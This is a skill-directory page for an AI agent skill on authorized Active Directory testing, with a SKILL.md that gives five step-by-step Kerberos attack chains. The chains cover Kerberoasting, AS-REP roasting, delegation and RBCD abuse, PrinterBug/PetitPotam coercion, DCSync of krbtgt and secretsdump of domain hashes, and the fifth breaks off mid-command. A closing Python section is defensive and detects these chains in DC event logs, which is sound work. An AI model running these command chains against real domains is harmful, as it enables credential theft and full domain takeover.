
Active Directory Kerberos Attacks
Plan authorized multi-step Kerberos attack chains from domain foothold to escalation when assessing Active Directory environments.
Overview
active-directory-kerberos-attacks is an agent skill for the Ship phase that documents multi-step Kerberos attack chains for authorized Active Directory penetration testing.
Install
npx skills add https://github.com/yaklang/hack-skills --skill active-directory-kerberos-attacks
What is this skill?
- Documented chain: Kerberoast → constrained delegation → domain admin via S4U2Self/S4U2Proxy
- RBCD plus Kerberos lateral movement from writable computer objects
- Step-by-step tooling references (GetUserSPNs, findDelegation, getST, secretsdump, addcomputer)
- Assumes base Kerberos SKILL.md loaded for individual techniques
- Explicit multi-step path planning from low-privilege user to DA
- Two documented multi-step chains: Kerberoast→delegation→DA and RBCD→lateral movement
- Four-step Kerberoast chain culminating in secretsdump on DC01
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You have a domain foothold and individual Kerberos tricks documented, but no ordered chain from low privilege to domain-wide compromise for the engagement.
Who is it for?
Authorized pentesters, security engineers, or MSPs assessing AD with Impacket-style tooling in lab or scoped production tests.
Skip if: Solo indie web-only builders, unauthorized domain access, or teams without an AD lab and explicit customer permission.
When should I use this skill?
Planning multi-step Kerberos attack paths from initial foothold to domain admin after the main Kerberos SKILL.md is loaded.
What do I get? / Deliverables
You get reproducible multi-step chains with tooling steps for Kerberoast-delegation-DA and RBCD lateral paths, ready to validate detections or close findings.
- Ordered attack chain with commands per step
- Escalation narrative from low-privilege user to domain-level access
Journey fit
End-to-end AD attack chains are documented for structured security assessments during enterprise ship or compliance exercises, not for everyday indie product coding. The Security subphase of Ship fits red-team-style validation of identity infrastructure before or after major releases.
How it compares
Chain orchestration layer on top of per-attack Kerberos docs—not a replacement for BloodHound hygiene or generic Windows hardening guides.
Common Questions / FAQ
Who is active-directory-kerberos-attacks for?
Security professionals planning authorized AD engagements who need end-to-end Kerberos escalation paths beyond single-technique cheat sheets.
When should I use active-directory-kerberos-attacks?
During ship-phase security assessments of on-prem or hybrid identity, purple-team exercises, or when scoping lateral movement after a low-privilege domain compromise in a lab.
Is active-directory-kerberos-attacks safe to install?
Review the Security Audits panel on this Prism page; content is offensive-security oriented and must only run under contract and legal authorization.
SKILL.md - Active Directory Kerberos Attacks
# Kerberos Multi-Step Attack Chains

> **AI LOAD INSTRUCTION**: Load this for end-to-end Kerberos attack chains that combine multiple AD techniques. Assumes the main [SKILL.md](./SKILL.md) is already loaded for individual Kerberos attacks. Use when planning multi-step attack paths from initial foothold to domain admin.

---

## 1. CHAIN: KERBEROAST → CONSTRAINED DELEGATION → DOMAIN ADMIN

### Scenario

Low-privilege domain user → cracked service account → delegation abuse → DA.

```
Step 1: Kerberoast
│  GetUserSPNs.py DOMAIN/lowpriv:password -dc-ip DC -request
│  hashcat -m 13100 tgs.txt wordlist.txt
│  → Cracked: svc_backup / P@ssw0rd2024
│
Step 2: Enumerate delegation
│  findDelegation.py DOMAIN/svc_backup:P@ssw0rd2024 -dc-ip DC
│  → svc_backup has constrained delegation to cifs/DC01.domain.com
│
Step 3: S4U2Self + S4U2Proxy
│  getST.py -spn cifs/DC01.domain.com -impersonate administrator DOMAIN/svc_backup:P@ssw0rd2024
│
Step 4: Access DC as administrator
│  export KRB5CCNAME=administrator.ccache
│  secretsdump.py -k -no-pass DC01.domain.com
│  → Domain hashes dumped
```

---

## 2. CHAIN: RBCD + KERBEROS → LATERAL MOVEMENT

### Scenario

Write access to a computer's `msDS-AllowedToActOnBehalfOfOtherIdentity` → RBCD → lateral to that host.

```
Step 1: Identify writable computer object
│  (via BloodHound: GenericWrite on TARGET$)
│
Step 2: Create machine account
│  addcomputer.py -computer-name 'EVIL$' -computer-pass 'Passw0rd!' DOMAIN/user:pass -dc-ip DC
│
Step 3: Set RBCD
│  rbcd.py -delegate-from 'EVIL$' -delegate-to 'TARGET$' -action write DOMAIN/user:pass -dc-ip DC
│
Step 4: S4U chain
│  getST.py -spn cifs/TARGET.domain.com -impersonate administrator DOMAIN/'EVIL$':'Passw0rd!' -dc-ip DC
│
Step 5: Use ticket
│  export KRB5CCNAME=administrator.ccache
│  psexec.py -k -no-pass TARGET.domain.com
```

---

## 3. CHAIN: UNCONSTRAINED DELEGATION + PRINTERBUG → DCSYNC

### Scenario

Compromised host with unconstrained delegation → coerce DC → capture DC TGT → DCSync.

```
Step 1: Confirm unconstrained delegation
│  Get-DomainComputer -Unconstrained (via PowerView)
│  → WEBSRV01.domain.com has unconstrained delegation
│
Step 2: Start Rubeus monitor on WEBSRV01
│  Rubeus.exe monitor /interval:5 /nowrap /targetuser:DC01$
│
Step 3: Coerce DC authentication
│  # From any domain machine, trigger PrinterBug:
│  SpoolSample.exe DC01.domain.com WEBSRV01.domain.com
│  # Or PetitPotam:
│  PetitPotam.py WEBSRV01.domain.com DC01.domain.com
│
Step 4: Capture DC01$ TGT from Rubeus output
│  Rubeus.exe ptt /ticket:base64_DC01_TGT
│
Step 5: DCSync with DC machine ticket
│  mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgt
│  → krbtgt hash obtained → golden ticket capability
```

---

## 4. CHAIN: AS-REP ROAST → ACL ABUSE → DCSYNC

### Scenario

No creds initially → AS-REP roast → cracked user has DCSync rights via ACL path.

```
Step 1: Enumerate users without preauth (no creds needed)
│  GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC -format hashcat
│  → $krb5asrep$23$svc_monitor@DOMAIN:...
│
Step 2: Crack AS-REP hash
│  hashcat -m 18200 asrep.txt wordlist.txt
│  → svc_monitor / Welcome2024!
│
Step 3: BloodHound enumeration
│  bloodhound-python -d domain.com -u svc_monitor -p Welcome2024! -c all -dc DC01
│  → svc_monitor has GenericAll on IT-ADMINS group
│  → IT-ADMINS group has DCSync rights
│
Step 4: Add self to IT-ADMINS
│  net rpc group addmem "IT-ADMINS" svc_monitor -U DOMAIN/svc_monitor -S DC01
│
Step 5: DCSync
│  secretsdump.py DOMAIN/svc_monitor:Welcome2024!@DC01
│  → All domain hashes
```

---

## 5. CHAIN: TARGETED KERBEROAST VIA ACL

### Scenario

GenericWrite on a user → set SPN → kerberoast → crack password.

```
Step 1: Identify GenericWrite permission
│  BloodHound: user "lowpriv" has GenericWrite on "svc_admin"
│
Step 2: Set SPN on target user (targeted kerberoasting)
│  # PowerView
│  Set-DomainObject -Identity svc_admin -Set @{serviceprincipalname='fake/service'}
│  # Or Impacket
│  addspn.py -u DOMAIN/lowpriv -p pa
```
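Detection coverage for the chains above, as an added example that is not part of the skill or of the tools it references: a Python rule set run over constructed Windows Security event records (4768, 4769, 4741, 5136) whose keys follow the events' EventData field names. The account names, SPNs and the three-SPN threshold are assumptions made for the sample.

```python
"""Detection rules for the telemetry the chains above leave in a DC's Security log.
Added example, not part of the skill; events are constructed dicts whose keys mirror
the EventData field names of Windows Security events 4768, 4769, 4741 and 5136."""
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23: the RC4 tickets that hashcat modes 13100 / 18200 crack
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"


def classify(ev):
    """Map one event to the chain step it evidences, or None."""
    eid = ev["EventID"]
    if eid == 4769:  # TGS request
        svc = ev["ServiceName"]
        if ev.get("TransitedServices"):  # set only for S4U2Proxy (constrained delegation, RBCD)
            return "s4u2proxy_delegation"
        if ev["TicketEncryptionType"] == RC4_HMAC and svc != "krbtgt" and not svc.endswith("$"):
            return "kerberoast_rc4_tgs"  # RC4 TGS for a user-account SPN
    elif eid == 4768 and ev.get("PreAuthType") == "0":  # AS-REQ with pre-auth disabled
        return "asrep_roast"
    elif eid == 5136 and ev["AttributeLDAPDisplayName"] == RBCD_ATTR:
        return "rbcd_attribute_written"  # what rbcd.py -action write leaves behind
    elif eid == 4741:  # computer account created (addcomputer.py)
        return "machine_account_created"
    return None


def detect(events, roast_threshold=3):
    """Return sorted (rule, account) findings; RC4 TGS hits are reported only when one
    account requests tickets for >= roast_threshold distinct SPNs (bulk-request pattern)."""
    findings, spns_per_account = [], defaultdict(set)
    for ev in events:
        rule = classify(ev)
        if rule == "kerberoast_rc4_tgs":
            spns_per_account[ev["TargetUserName"]].add(ev["ServiceName"])
        elif rule:
            findings.append((rule, ev.get("TargetUserName") or ev.get("SubjectUserName")))
    findings += [("kerberoast_rc4_tgs", a) for a, s in spns_per_account.items() if len(s) >= roast_threshold]
    return sorted(findings)


# Constructed sample log: Kerberoast burst, benign krbtgt TGS, AS-REP roast, RBCD write, S4U2Proxy
SAMPLE_EVENTS = [
    *({"EventID": 4769, "TargetUserName": "lowpriv@DOMAIN", "ServiceName": s, "TicketEncryptionType": RC4_HMAC,
       "TransitedServices": ""} for s in ("svc_backup", "svc_sql", "svc_web")),
    {"EventID": 4769, "TargetUserName": "host1$@DOMAIN", "ServiceName": "krbtgt", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 4768, "TargetUserName": "svc_monitor", "PreAuthType": "0"},
    {"EventID": 5136, "SubjectUserName": "user", "AttributeLDAPDisplayName": RBCD_ATTR},
    {"EventID": 4769, "TargetUserName": "administrator@DOMAIN", "ServiceName": "cifs/DC01",
     "TicketEncryptionType": "0x12", "TransitedServices": "svc_backup@DOMAIN"},
]
```

An account restricted to AES keys via msDS-SupportedEncryptionTypes never produces the RC4 events the first rule keys on, so a burst of AES TGS requests for user SPNs deserves a threshold rule of its own. Chain 3's coercion step leaves its evidence on the unconstrained host rather than in these four DC-side event IDs.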